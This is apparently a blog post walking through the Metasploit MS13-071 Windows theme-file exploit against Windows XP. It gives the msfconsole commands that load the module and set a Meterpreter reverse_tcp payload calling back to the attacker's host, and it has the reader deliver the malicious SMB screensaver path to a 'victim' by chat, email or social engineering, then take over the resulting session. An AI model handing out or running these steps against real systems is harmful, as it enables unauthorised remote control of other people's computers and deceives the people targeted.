Hack PC in Network Using Microsoft Windows Theme File Handling Arbitrary Code Execution

at 12:04 PM Saturday, September 21, 2013
This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed.

Exploit Targets
Windows XP SP 3

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/ms13_071_theme
msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_071_theme)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (ms13_071_theme)>set srvhost 192.168.1.3
msf exploit (ms13_071_theme)>exploit 

Now an URL you should give to your victim \\192.168.1.3:\gCzJXDK\tJugDsVFC.scr via chat or email or any social engineering technique.




Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)